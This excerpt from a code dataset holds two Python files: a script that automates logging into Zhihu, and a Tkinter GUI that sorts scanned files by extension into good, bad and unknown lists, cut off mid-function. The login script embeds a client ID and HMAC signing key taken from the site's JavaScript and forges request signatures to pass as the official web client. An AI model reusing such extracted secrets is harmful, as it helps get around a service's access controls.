+{"seq_id": "484197808", "text": "# coding: utf-8\n\nfrom http import cookiejar\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nimport requests\nimport time\nimport re\nimport json\nimport base64\nimport hmac\nimport hashlib\n\n\nHEADERS = {\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\",\n \"Accept-Encoding\": \"gzip, deflate, br\",\n \"Accept-Language\": \"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\",\n \"Connection\": \"keep-alive\",\n \"Host\": \"www.zhihu.com\",\n \"Upgrade-Insecure-Requests\": \"1\",\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0\",\n}\n\nLOGIN_URL = 'https://www.zhihu.com/signup'\nLOGIN_API = 'https://www.zhihu.com/api/v3/oauth/sign_in'\n\nFORM_DATA = {\n\n \"client_id\": \"c3cef7c66a1843f8b3a9e6a1e3160e20\",\n \"grant_type\": \"password\",\n \"source\": \"com.zhihu.web\",\n \"username\": '',\n \"password\": '',\n \"lang\": \"cn\",\n \"ref_source\": \"homepage\",\n}\n\n\nclass ZHIHULogin(object):\n \n def __init__(self):\n\n self.login_url = LOGIN_URL\n self.login_api = LOGIN_API\n self.login_data = FORM_DATA\n self.session = requests.session()\n self.headers = HEADERS.copy()\n self.cookies = cookiejar.LWPCookieJar(filename='./cookies.txt')\n \n\n def login(self, load_cookies=True):\n \n \"\"\"\n 模拟登录知乎\n :param load_cookies: 是否读取上次保存的 Cookies\n :return: bool\n \"\"\"\n if load_cookies and self.load_cookies():\n if self.check_login():\n print('已读取 Cookies 并登录成功')\n return True\n else:\n print('保存的 Cookies 已过期,将重新登录')\n\n\n headers = self.headers.copy()\n xsrf, udid = self._get_token_udid()\n print(self.session.cookies.get_dict())\n headers.update({\n \"x-udid\": udid,\n \"x-xsrftoken\": xsrf,\n 'authorization': 'oauth c3cef7c66a1843f8b3a9e6a1e3160e20',\n })\n headers.update({'origin': 'https://www.zhihu.com','Referer': 'https://www.zhihu.com/signup','Accept': 'application/json, text/plain, */*'})\n self.login_data.update({\n 'username': self._input_data('username', '登录手机'),\n 'password': self._input_data('password', '密码')\n })\n timestamp = str(int(time.time()*1000))\n self.login_data.update({\n \"timestamp\": timestamp,\n \"signature\": self._get_signature(timestamp),\n \"captcha\": self._get_captcha(headers.copy()),\n })\n\n res = self.session.post(self.login_api, data=self.login_data, headers=headers)\n print(self.session.cookies.get_dict())\n print(res.text,res.status_code)\n if '验证码' in res.text:\n print('验证码错误')\n elif self.check_login():\n print('登录成功')\n return True\n print('登录失败')\n return False\n\n\n def load_cookies(self):\n \n \"\"\"\n 读取 Cookies 文件加载到 Session\n :retur\n \"\"\"\n try:\n self.cookies.load(ignore_discard=True)\n except FileNotFoundError:\n print('Cookies.txt 未找到,读取失败')\n else:\n #工具方法转换成字典\n load_cookies = requests.utils.dict_from_cookiejar(self.cookies)\n #工具方法将字典转换成RequestsCookieJar,赋值给session的cookies.\n self.session.cookies = requests.utils.cookiejar_from_dict(load_cookies)\n return True\n return False \n\n def check_login(self):\n \"\"\"\n 检查登录状态,访问登录页面出现跳转则是已登录,\n 如登录成功保存当前 Cookies\n :return: bool\n \"\"\"\n res = self.session.get(self.login_url, headers=self.headers, allow_redirects=False)\n print(res.status_code)\n if res.status_code == 302:\n # self.session.cookies.save()\n #将转换成字典格式的RequestsCookieJar(这里我用字典推导手动转的)保存到LWPcookiejar中\n requests.utils.cookiejar_from_dict({c.name: c.value for c in self.session.cookies}, self.cookies)\n self.cookies.save(ignore_discard=True, ignore_expires=True)\n return True\n return 
False\n\n    def _get_token_udid(self):\n        \"\"\"\n        Get the xsrf token and udid from the login page cookies\n        :return:\n        \"\"\"\n        cookies_dict = {}\n        token = udid = None\n        res = self.session.get(self.login_url,headers=self.headers)\n        print(\"Step 1 request: status code %s\" % res.status_code)\n        if res.status_code == 200:\n            # cookies_dict = requests.utils.dict_from_cookiejar(self.session.cookies)\n            cookies_dict = self.session.cookies.get_dict()\n\n            if cookies_dict['_xsrf']:\n                token = cookies_dict.get('_xsrf')\n            if cookies_dict['d_c0']:\n                udid = cookies_dict.get('d_c0').split(\"|\")[0].replace(\"\\\"\",\"\")\n        print(\"token is %s and udid is %s\" % (token, udid))\n        return token, udid\n\n\n    def _get_captcha(self, headers, lang='cn'):\n        \"\"\"\n        Hit the captcha API; it must be called once whether or not a captcha is required\n        If a captcha is required, the response carries the image as base64\n        Two captcha styles are available; both need manual input\n        :param headers: request headers carrying the authorization info\n        :param lang: captcha kind; 'cn' clicks upside-down characters, 'en' types them\n        :return: the captcha POST parameter\n        \"\"\"\n\n        if lang == 'cn':\n            api = 'https://www.zhihu.com/api/v3/oauth/captcha?lang=cn'\n        else:\n            api = 'https://www.zhihu.com/api/v3/oauth/captcha?lang=en'\n\n        if headers.get('x-xsrftoken'):\n            headers.pop('x-xsrftoken')\n        res = self.session.get(api, headers=headers)\n        print(\"Step 2 request: status code %s\" % res.status_code)\n        show_captcha = re.search(r'true', res.text)\n        if show_captcha:\n            put_res = self.session.put(api, headers=headers)\n            content = base64.b64decode(json.loads(put_res.text)['img_base64'])\n            with open('./captcha.png', 'wb') as f:\n                f.write(content)\n            image = Image.open('./captcha.png')\n            if lang == 'cn':\n                plt.imshow(image)\n                print('Click every upside-down character, then press Enter to submit')\n                points = plt.ginput(7)\n                capt = json.dumps({'img_size': [200, 44],'input_points': [[i[0]/2, i[1]/2] for i in points]})\n            else:\n                image.show()\n                capt = input('Enter the captcha shown in the image: ')\n            \n            # the answer must first be POSTed back to the captcha API\n            self.session.post(api, data={'input_text': capt}, headers=headers)\n            return capt\n        else:\n            print(\"No captcha required\")\n            return ''\n\n\n    def _get_signature(self, timestamp):\n        \"\"\"\n        Compute and return the request signature via HMAC\n        (a few fixed strings plus the timestamp)\n        :param timestamp: millisecond timestamp\n        :return: the signature\n        https://static.zhihu.com/heifetz/main.app.268c34bc2abd4304ea97.js\n        \"\"\"\n        ha = hmac.new(b'd1b964811afb40118a12068ff74a12f4', digestmod=hashlib.sha1)\n        grant_type = self.login_data['grant_type']\n        client_id = self.login_data['client_id']\n        source = self.login_data['source']\n        # the concatenation order must not change\n        ha.update(bytes((grant_type + client_id + source + timestamp), 'utf-8'))\n        signature = ha.hexdigest()\n        print('signature string: %s' % signature)\n        return signature\n\n    def _input_data(self, key, data_name):\n        \"\"\"\n        Prompt for a form_data parameter that was left empty\n        :param key: the key name\n        :param data_name: human-readable name used in the prompt\n        :return: the entered value\n        \"\"\"\n        value = self.login_data.get(key)\n        if not value:\n            value = input('Please enter {}: '.format(data_name))\n        return value\n\n\nif __name__ == '__main__':\n    account = ZHIHULogin()\n    account.login()\n    # After a successful login, request a page like the one below to test.\n    # Keep only the headers shown here, otherwise the response comes back garbled.\n    # h: {'Host': 'zhuanlan.zhihu.com', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0', 'Referer': 'https://www.zhihu.com/'}\n    # res = s.get('https://zhuanlan.zhihu.com/p/35986817',headers=h)\n", "sub_path": "zhihu/login.py", "file_name": "login.py", "file_ext": "py", "file_size_in_byte": 8474, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "requests.session", "line_number": 47, "usage_type": "call"}, {"api_name": "http.cookiejar.LWPCookieJar", "line_number": 49, "usage_type": "call"}, {"api_name": "http.cookiejar", "line_number": 49, "usage_type": "name"}, {"api_name": "time.time", "line_number": 80, "usage_type": "call"}, 
{"api_name": "requests.utils.dict_from_cookiejar", "line_number": 111, "usage_type": "call"}, {"api_name": "requests.utils", "line_number": 111, "usage_type": "attribute"}, {"api_name": "requests.utils.cookiejar_from_dict", "line_number": 113, "usage_type": "call"}, {"api_name": "requests.utils", "line_number": 113, "usage_type": "attribute"}, {"api_name": "requests.utils.cookiejar_from_dict", "line_number": 128, "usage_type": "call"}, {"api_name": "requests.utils", "line_number": 128, "usage_type": "attribute"}, {"api_name": "re.search", "line_number": 173, "usage_type": "call"}, {"api_name": "base64.b64decode", "line_number": 176, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 179, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 179, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 181, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 181, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ginput", "line_number": 183, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 183, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 184, "usage_type": "call"}, {"api_name": "hmac.new", "line_number": 205, "usage_type": "call"}, {"api_name": "hashlib.sha1", "line_number": 205, "usage_type": "attribute"}]}
+{"seq_id": "194213413", "text": "#File Scanner\r\n#Made by Jack Carmichael\r\n\"\"\"\r\n===================================================================================\r\nObject--------------------Parameters--------------------Inheritance\r\n -AppWindow() -void -object\r\n -FileInfo() -frame -object\r\n -CurrentFileInfo() -frame -object\r\n -AcanGui() -file_listboxes,progress_bar -object\r\n -ProgressBar() -frame,length,height -TkinterWrapper.WindowCanvas\r\n -Scan() -directory,scan_gui -object\r\n -FIleType() -file_extension,file_consensus -object\r\n -FileTypeEditor() -parrent_window,edit_type -object\r\n -SetDirWindow() -parent_window -object\r\n -DirectoryListbox() -frame,companion_text_entry -TkinterWrapper.WindowListbox\r\n -ComputerDirectory() -void -object\r\n -SavedInfo() -void -object\r\n===================================================================================\r\nStill to do:\r\n -bind left click event with filetype listboxes. Options are to add to file type list\r\n\"\"\"\r\n\r\nimport os\r\nimport time\r\nfrom functools import partial\r\nimport UserErrorMessage\r\nimport TkinterWrapper\r\nimport FileWrapper\r\n\r\nALAPHABET=\"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\r\nUP_TRIANGLE=\"{0}\".format('\\u25B2')\r\nDOWN_TRIANGLE=\"{0}\".format('\\u25BC')\r\nLEFT_TRIANGLE=\"{0}\".format('\\u25C0')\r\nRIGHT_TRIANGLE=\"{0}\".format('\\u25B6')\r\nSMALL_RIGHT_TRIANGLE=\"{0}\".format('\\u25B8')\r\n\r\n#SPLIT UP! Make information frame a class and call update methods on it\r\nclass AppWindow(object):\r\n def __init__(self):\r\n self.app_window=TkinterWrapper.Window(\"File Scanner\")\r\n self.update_scan_flags(False,False,False)\r\n self.__setup_window()\r\n self.__setup_menu()\r\n self.__setup_frames()\r\n self.update_frames()\r\n self.app_window.start_mainloop()\r\n\r\n def __setup_window(self):\r\n self.app_window.remove_min_max_buttons(False)\r\n self.app_window.resizable(False,False)\r\n\r\n def __setup_menu(self):\r\n self.menu=TkinterWrapper.WindowMenu(self.app_window.get_window())\r\n self.file_cascade=TkinterWrapper.WindowMenuCascade(self.app_window.get_window(),False)\r\n self.file_cascade.add_item_to_cascade(\"Quit\",self.app_window.destroy_window)\r\n self.edit_cascade=TkinterWrapper.WindowMenuCascade(self.app_window.get_window(),False)\r\n self.edit_cascade.add_item_to_cascade(\"Known-Good Filetypes\",partial(self.add_known_file_type,\"KnownGood\"))\r\n self.edit_cascade.add_item_to_cascade(\"Known-Bad Filetypes\",partial(self.add_known_file_type,\"KnownBad\"))\r\n self.menu.add_cascade_to_menu(\"File\",self.file_cascade.get_cascade())\r\n self.menu.add_cascade_to_menu(\"Edit\",self.edit_cascade.get_cascade())\r\n\r\n def __setup_frames(self):\r\n self.process_information_frame=TkinterWrapper.WindowFrame(self.app_window.get_window())\r\n self.found_files_frame=TkinterWrapper.WindowFrame(self.app_window.get_window())\r\n self.current_file_frame=TkinterWrapper.WindowFrame(self.app_window.get_window())\r\n for item in [[self.process_information_frame,\"top\"],[self.current_file_frame,\"top\"],[self.found_files_frame,\"top\"]]:\r\n item[0].pack_frame(item[1],0,0)\r\n self.file_information_frame=FileInfo(self.found_files_frame.get_frame())\r\n self.current_file_information_frame=CurrentFileInfo(self.current_file_frame)\r\n\r\n def update_frames(self):\r\n self.process_information_frame.destroy_all_child_widgets()\r\n self.update_process_information_frame()\r\n self.file_information_frame.update_frame(self.directory_set,self.process_running,self.scan_finished)\r\n 
self.current_file_information_frame.update_frame(self.process_running)\r\n\r\n def update_process_information_frame(self):\r\n if self.process_running==False and self.directory_set==False and self.scan_finished==False:\r\n self.update_process_information_frame_for_idle(\"Please select a folder to scan.\",\"Set Search Folder\",self.open_dir_selection_dialogbox)\r\n elif self.process_running==False and self.directory_set==True and self.scan_finished==False:\r\n self.update_process_information_frame_for_idle(\"Set to scan: {0}\".format(saved_information.get_directory_to_scan()),\"Scan\",self.commence_scan)\r\n self.add_button_to_process_information_frame(\"Change Folder To Scan\",self.open_dir_selection_dialogbox)\r\n elif self.process_running==True and self.directory_set==True and self.scan_finished==False:\r\n self.update_process_information_frame_for_task()\r\n elif self.process_running==False and self.directory_set==False and self.scan_finished==True:\r\n self.update_process_information_frame_for_idle(\"Scan Completed\",\"Scan Something Else\",self.open_dir_selection_dialogbox)\r\n\r\n def update_process_information_frame_for_idle(self,top_text,button_text,button_action):\r\n label=TkinterWrapper.WindowLabel(self.process_information_frame.get_frame(),\"{0}\".format(top_text))\r\n label.configure_colors(\"dodgerblue2\",\"grey95\",\"times 11\")\r\n label.pack_label(\"top\",0,0)\r\n self.add_button_to_process_information_frame(button_text,button_action)\r\n def add_button_to_process_information_frame(self,button_text,button_action):\r\n button=TkinterWrapper.WindowButton(self.process_information_frame.get_frame(),\"{0}\".format(button_text),button_action)\r\n button.pack_button(\"top\",0,1)\r\n\r\n def update_process_information_frame_for_task(self):\r\n top_text=TkinterWrapper.WindowLabel(self.process_information_frame.get_frame(),\"Scanning....\")\r\n top_text.configure_colors(\"grey20\",\"grey95\",\"times 14\")\r\n top_text.pack_label(\"top\",0,0)\r\n top_text=TkinterWrapper.WindowLabel(self.process_information_frame.get_frame(),\"Scanning: {0}\".format(saved_information.get_directory_to_scan()))\r\n top_text.configure_colors(\"dodgerblue2\",\"grey95\",\"times 10\")\r\n top_text.pack_label(\"top\",0,0)\r\n self.progress_bar=Progressbar(self.process_information_frame.get_frame(),400,30)\r\n\r\n def add_known_file_type(self,type_consensus):\r\n dialog_box=FileTypeEditor(self.app_window.get_window(),type_consensus)\r\n\r\n def open_dir_selection_dialogbox(self):\r\n directory_selection=SetDirWindow(self.app_window.get_window())\r\n if directory_selection.get_saved_directory!=\"\":\r\n saved_information.set_directory_to_scan(directory_selection.get_saved_directory())\r\n self.update_scan_flags(True,False,False)\r\n self.update_frames()\r\n\r\n def commence_scan(self):\r\n self.update_scan_flags(True,True,False)\r\n self.update_frames()\r\n scan_gui=ScanGUI(self.file_information_frame.get_listboxes(),self.progress_bar,self.current_file_information_frame)\r\n self.scan=Scan(saved_information.get_directory_to_scan(),scan_gui)\r\n self.scan.start()\r\n scan_gui.start_checking_for_selection()\r\n self.update_scan_flags(False,False,True)\r\n self.update_frames()\r\n\r\n def update_scan_flags(self,directory_set_flag,process_running_flag,scan_finished_flag):\r\n self.process_running=process_running_flag\r\n self.directory_set=directory_set_flag\r\n self.scan_finished=scan_finished_flag\r\n\r\n\r\nclass FileInfo(object):\r\n def __init__(self,frame):\r\n self.frame=frame\r\n 
self.__setup_file_types_frames()\r\n\r\n def __setup_file_types_frames(self):\r\n self.ok_files_frame=TkinterWrapper.WindowFrame(self.frame)\r\n self.bad_files_frame=TkinterWrapper.WindowFrame(self.frame)\r\n self.unknown_files_frame=TkinterWrapper.WindowFrame(self.frame)\r\n for frame in [[self.ok_files_frame,\"left\"],[self.bad_files_frame,\"left\"],[self.unknown_files_frame,\"left\"]]:\r\n frame[0].pack_frame(frame[1],0,0)\r\n\r\n def update_frame(self,directory_set,process_running,scan_finished):\r\n self.destroy_all_widgets(scan_finished)\r\n if (process_running==False or directory_set==False) and scan_finished!=True:\r\n for item in [[self.ok_files_frame,\"Ok\"],[self.bad_files_frame,\"Potentialy Harmfull\"],[self.unknown_files_frame,\"Unknown\"]]:\r\n item[0].configure_border(\"ridge\",2)\r\n self.insert_file_explaning_note(item[0],item[1])\r\n elif process_running==True and directory_set==True:\r\n self.listboxes=[]\r\n self.update_file_frame_for_task(self.ok_files_frame.get_frame(),\"Ok\")\r\n self.update_file_frame_for_task(self.bad_files_frame.get_frame(),\"Potentialy Harmfull\")\r\n self.update_file_frame_for_task(self.unknown_files_frame.get_frame(),\"Unknown\")\r\n\r\n def destroy_all_widgets(self,scan_finished):\r\n if scan_finished!=True:\r\n for frame in [self.ok_files_frame,self.bad_files_frame,self.unknown_files_frame]:\r\n frame.destroy_all_child_widgets()\r\n\r\n def insert_file_explaning_note(self,frame,text):\r\n information_label=TkinterWrapper.WindowLabel(frame.get_frame(),\"{0} files will be\\nshown here after a scan\".format(text))\r\n information_label.configure_colors(\"grey50\",\"grey95\",\"times 10\")\r\n information_label.pack_label(\"top\",0,2)\r\n\r\n def update_file_frame_for_task(self,frame,text):\r\n label=TkinterWrapper.WindowLabel(frame,\"{0} Files:\".format(text))\r\n label.configure_colors(\"grey60\",\"grey95\",\"times 12\")\r\n label.pack_label(\"top\",0,0)\r\n self.setup_textbox_frame(frame)\r\n self.setup_textbox_x_scrollbar_frame(frame)\r\n\r\n def setup_textbox_frame(self,file_frame):\r\n frame=TkinterWrapper.WindowFrame(file_frame)\r\n frame.pack_frame(\"top\",0,0)\r\n listbox=TkinterWrapper.WindowListbox(frame.get_frame())\r\n listbox.pack_listbox(\"left\",0,0)\r\n listbox.configure_size(40,30)\r\n scrollbar=TkinterWrapper.WindowScrollbar(frame.get_frame(),\"y\")\r\n scrollbar.attach_to_widget(listbox.get_listbox())\r\n listbox.attach_scrollbar(\"y\",scrollbar.get_scrollbar())\r\n scrollbar.pack_scrollbar(\"left\",0,0)\r\n self.listboxes.append(listbox)\r\n\r\n def setup_textbox_x_scrollbar_frame(self,file_frame,):\r\n frame=TkinterWrapper.WindowFrame(file_frame)\r\n frame.pack_frame(\"top\",0,0)\r\n scrollbar=TkinterWrapper.WindowScrollbar(frame.get_frame(),\"x\")\r\n scrollbar.attach_to_widget(self.listboxes[len(self.listboxes)-1].get_listbox())\r\n self.listboxes[len(self.listboxes)-1].attach_scrollbar(\"x\",scrollbar.get_scrollbar())\r\n scrollbar.pack_scrollbar(\"top\",0,0) \r\n\r\n def get_listboxes(self):\r\n return self.listboxes\r\n\r\n\r\nclass CurrentFileInfo(object):\r\n def __init__(self,frame):\r\n self.frame=frame\r\n self.__setup_dummy_frame()\r\n self.setup_frames()\r\n self.make_labels()\r\n\r\n def __setup_dummy_frame(self):\r\n dummy_frame=TkinterWrapper.WindowFrame(self.frame.get_frame())\r\n dummy_frame.pack_frame(\"top\",0,0)\r\n\r\n def setup_frames(self):\r\n self.top_frame=TkinterWrapper.WindowFrame(self.frame.get_frame())\r\n self.bottom_frame=TkinterWrapper.WindowFrame(self.frame.get_frame())\r\n for frame,position 
in [[self.top_frame,\"top\"],[self.bottom_frame,\"top\"]]:\r\n frame.pack_frame(position,0,0)\r\n\r\n def make_labels(self):\r\n self.file_fraction=TkinterWrapper.WindowLabel(self.top_frame.get_frame(),\"\")\r\n self.file_fraction.configure_colors(\"grey40\",\"grey95\",\"times 11\")\r\n self.current_file=TkinterWrapper.WindowLabel(self.bottom_frame.get_frame(),\"Current File:\")\r\n self.current_file.configure_colors(\"grey40\",\"grey95\",\"times 10\")\r\n self.file_entry=TkinterWrapper.WindowEntry(self.bottom_frame.get_frame())\r\n self.file_entry.configure_size(115)\r\n\r\n def update_frame(self,process_running):\r\n if process_running==True:\r\n self.file_fraction.pack_label(\"top\",0,0)\r\n self.current_file.pack_label(\"left\",0,0)\r\n self.file_entry.pack_entry(\"left\",0,0)\r\n else:\r\n self.top_frame.destroy()\r\n self.bottom_frame.destroy()\r\n self.setup_frames()\r\n self.make_labels()\r\n\r\n def update_file_fraction(self,numerator,denominator):\r\n self.file_fraction.configure_text(\"{0} out of {1} files scanned\".format(numerator,denominator))\r\n def update_current_file(self,current_file_directory):\r\n self.file_entry.configure_entry_text(\"{0}\".format(current_file_directory))\r\n\r\n\r\nclass ScanGUI(object):\r\n def __init__(self,file_listboxes,progress_bar,current_info):\r\n self.file_listboxes=file_listboxes\r\n self.progress_bar=progress_bar\r\n self.current_file_information=current_info\r\n self.selections=[[\"\",\"\"],[\"\",\"\"],[\"\",\"\"]]\r\n self.listbox_being_used=[False,False,False]\r\n\r\n def update_file_lists(self,files):\r\n self.file_list=files\r\n self.check_for_selection()\r\n for x in range(0,3):\r\n if self.listbox_being_used[x]==False:\r\n self.file_listboxes[x].delete_text(0,\"end\")\r\n for file in files:\r\n if (file.get_file_consensus()==\"KnownGood\" and self.listbox_being_used[0]==False) or\\\r\n (file.get_file_consensus()==\"KnownBad\" and self.listbox_being_used[1]==False) or\\\r\n (file.get_file_consensus()==\"Unknown\" and self.listbox_being_used[2]==False):\r\n self.add_item_to_listbox(file.get_file_consensus(),file.get_file_extension(),file.get_number_of_files())\r\n\r\n def add_item_to_listbox(self,item_consensus,item_name,number_of_item):\r\n if item_consensus==\"KnownGood\":\r\n self.file_listboxes[0].insert_text(\"{0} {1:4s} Files ({2})\\n\".format(RIGHT_TRIANGLE,item_name,number_of_item),\"end\")\r\n elif item_consensus==\"KnownBad\":\r\n self.file_listboxes[1].insert_text(\"{0} {1:4s} Files ({2})\\n\".format(RIGHT_TRIANGLE,item_name,number_of_item),\"end\")\r\n elif item_consensus==\"Unknown\":\r\n self.file_listboxes[2].insert_text(\"{0} {1:4s} Files ({2})\\n\".format(RIGHT_TRIANGLE,item_name,number_of_item),\"end\")\r\n\r\n def update_progress_bar(self,percentage,part,total_parts):\r\n self.progress_bar.update(percentage,part,total_parts)\r\n\r\n def update_current_information(self,numerator,denominator,current_file_directory):\r\n self.current_file_information.update_file_fraction(numerator,denominator)\r\n self.current_file_information.update_current_file(current_file_directory)\r\n\r\n def start_checking_for_selection(self):\r\n self.check_for_selection()\r\n #This is not a good solution, better way to check every 250ms?\r\n self.file_listboxes[0].get_listbox().after(250,self.start_checking_for_selection)\r\n\r\n def check_for_selection(self):\r\n for x in range(0,3):\r\n self.selections[x][0]=self.file_listboxes[x].get_current_selection()\r\n 
self.selections[x][0]=self.file_listboxes[x].get_text_from_index(self.selections[x][0])\r\n for x in range(0,3):\r\n if self.selections[x][0]!=self.selections[x][1] and self.selections[x][0]!=None:\r\n print(\"Selection in listbox {0} has changed to: {1}\".format(x,self.selections[x][0]))\r\n self.selection_actions(x)\r\n self.selections[x][1]=self.selections[x][0]\r\n\r\n def selection_actions(self,listbox):\r\n if RIGHT_TRIANGLE in self.selections[listbox][0]:\r\n self.show_file_type_places(self.selections[listbox][0],listbox)\r\n elif LEFT_TRIANGLE in self.selections[listbox][0]:\r\n self.go_back_to_file_type_list(listbox)\r\n elif SMALL_RIGHT_TRIANGLE in self.selections[listbox][0]:\r\n self.open_file_explorer(self.selections[listbox][0])\r\n\r\n def show_file_type_places(self,selection,listbox):\r\n self.listbox_being_used[listbox]=True\r\n print(\"Selection: \"+selection)\r\n for file in self.file_list:\r\n if file.get_file_extension()==self.get_file_extension_from_selection(selection):\r\n self.insert_file_places(file,listbox)\r\n\r\n def get_file_extension_from_selection(self,selection):\r\n file_extension=\"\"\r\n for x in range(2,len(selection)):\r\n if selection[x]!=\" \" and selection[x]!=\"(\" and selection[x]!=\")\":\r\n file_extension+=selection[x]\r\n else:\r\n return file_extension\r\n\r\n def insert_file_places(self,file_type,listbox):\r\n self.file_listboxes[listbox].delete_text(0,\"end\")\r\n self.add_directional_information(listbox)\r\n for item in file_type.get_file_type_locations():\r\n self.file_listboxes[listbox].insert_text(\"{0} {1}\\n\".format(SMALL_RIGHT_TRIANGLE,item),\"end\")\r\n\r\n def add_directional_information(self,listbox):\r\n self.file_listboxes[listbox].insert_text(\"{0} Back to File List\\n\".format(LEFT_TRIANGLE),\"end\")\r\n self.file_listboxes[listbox].insert_text(\"{0} {1} Files\\n\".format(DOWN_TRIANGLE,self.get_file_extension_from_selection\\\r\n (self.selections[listbox][0])),\"end\")\r\n\r\n def go_back_to_file_type_list(self,listbox):\r\n self.listbox_being_used[listbox]=False\r\n self.file_listboxes[listbox].delete_text(0,\"end\")\r\n for file in self.file_list:\r\n if file.get_file_consensus()==\"KnownGood\" and listbox==0:\r\n self.add_item_to_listbox(\"KnownGood\",file.get_file_extension(),file.get_number_of_files())\r\n elif file.get_file_consensus()==\"KnownBad\" and listbox==1:\r\n self.add_item_to_listbox(\"KnownBad\",file.get_file_extension(),file.get_number_of_files())\r\n elif file.get_file_consensus()==\"Unknown\" and listbox==2:\r\n self.add_item_to_listbox(\"Unknown\",file.get_file_extension(),file.get_number_of_files())\r\n\r\n def open_file_explorer(self,file_location):\r\n file_location=file_location[2:len(file_location):1]\r\n for x in range(len(file_location)-1,0,-1):\r\n if file_location[x]==\"\\\\\":\r\n file_location=file_location[0:x:1]\r\n break\r\n os.startfile(r\"{0}\".format(file_location))\r\n\r\n\r\nclass Progressbar(TkinterWrapper.WindowCanvas):\r\n def __init__(self,frame,length,height):\r\n self.length=length\r\n self.height=height\r\n self.percentage=0\r\n self.rectangle_point=0\r\n super(Progressbar, self).__init__(frame,self.length,height)\r\n super(Progressbar, self).pack_canvas(\"top\",0,0)\r\n\r\n def update(self,percentage,part,total_parts):\r\n self.percentage=percentage\r\n super(Progressbar, self).delete_all_contents()\r\n self.update_part(part,total_parts)\r\n self.update_rectangle()\r\n self.update_text()\r\n self.canvas.update()\r\n\r\n def update_part(self,part,total_parts):\r\n 
super(Progressbar, self).add_text(self.length/2,6,\"Part {0} of {1}\".format(part,total_parts),\"grey10\",\"times 9\")\r\n\r\n def update_rectangle(self):\r\n super(Progressbar, self).add_rectangle(2,13,self.length,self.height,\"lightblue\")\r\n if self.percentage==\"GoThrough\":\r\n self.calculate_go_through_rectangle()\r\n super(Progressbar, self).add_rectangle(self.rectangle_point,13,self.rectangle_point+100,self.height,\"cornflowerblue\")\r\n else:\r\n self.rectangle_point=self.length*self.percentage\r\n super(Progressbar, self).add_rectangle(2,13,self.rectangle_point,self.height,\"cornflowerblue\")\r\n\r\n def calculate_go_through_rectangle(self):\r\n if self.rectangle_point>=self.length:\r\n self.rectangle_point=0\r\n else:\r\n self.rectangle_point+=0.05\r\n \r\n def update_text(self):\r\n if type(self.percentage).__name__!='str':\r\n if self.percentage<=0.95:\r\n super(Progressbar, self).add_text(370,self.height-8,\"{0}%\".format(int(self.percentage*100)),\"grey10\",\"times 14\")\r\n else:\r\n super(Progressbar, self).add_text(370,self.height-8,\"{0}%\".format(int(self.percentage*100)),\"grey80\",\"times 14\")\r\n\r\n \r\nclass Scan(object):\r\n def __init__(self,directory,scan_gui):\r\n self.scan_directory=directory\r\n self.scan_gui=scan_gui\r\n self.set_scan_variables()\r\n self.known_good_filetypes=saved_information.get_known_good_filetypes()\r\n self.known_bad_filetypes=saved_information.get_known_bad_filetypes()\r\n \r\n def set_scan_variables(self):\r\n self.current_directory=\"\"\r\n self.scanned_files=0\r\n self.file_extensions=[]\r\n self.file_type_object_list=[]\r\n \r\n def start(self):\r\n self.set_scan_variables()\r\n self.set_number_of_files()\r\n for root, dirs, files in os.walk(\"{0}\".format(self.scan_directory), topdown=True):\r\n for name in files:\r\n self.current_directory=\"{0}\\\\{1}\".format(root,name)\r\n self.scan_file(root,name)\r\n self.update_scan_gui(2)\r\n\r\n def set_number_of_files(self):\r\n print(self.scan_directory)\r\n self.number_of_files=0\r\n for root, dirs, files in os.walk(\"{0}\".format(self.scan_directory), topdown=True):\r\n self.number_of_files+=len(files)\r\n self.update_scan_gui(1)\r\n print(\"Number of files: {0}\".format(self.number_of_files))\r\n\r\n def scan_file(self,root,file):\r\n file_name,file_extension=os.path.splitext(\"{0}\".format(file))\r\n self.append_file_type(file_extension)\r\n self.update_file_type_object_list(root,file_extension,file_name)\r\n self.scanned_files+=1\r\n\r\n def append_file_type(self,file_extension):\r\n if file_extension not in self.file_extensions:\r\n self.file_extensions.append(file_extension)\r\n\r\n def update_file_type_object_list(self,file_path,file_extension,file_name):\r\n for item in self.file_type_object_list:\r\n if item.get_file_extension()==file_extension:\r\n item.add_file_to_list(\"{0}\\\\{1}\".format(file_path,file_name))\r\n break\r\n else:\r\n self.check_file_type_and_add_to_list(file_path,file_extension,file_name)\r\n\r\n def check_file_type_and_add_to_list(self,file_path,file_extension,file_name):\r\n if file_extension in self.known_good_filetypes:\r\n initializer=\"KnownGood\"\r\n elif file_extension in self.known_bad_filetypes:\r\n initializer=\"KnownBad\"\r\n else:\r\n initializer=\"Unknown\"\r\n new_file_type=FileType(file_extension,initializer)\r\n new_file_type.add_file_to_list(\"{0}\\\\{1}\".format(file_path,file_name))\r\n self.file_type_object_list.append(new_file_type)\r\n\r\n def update_scan_gui(self,part):\r\n if part==1:\r\n percent=\"GoThrough\"\r\n elif part==2:\r\n 
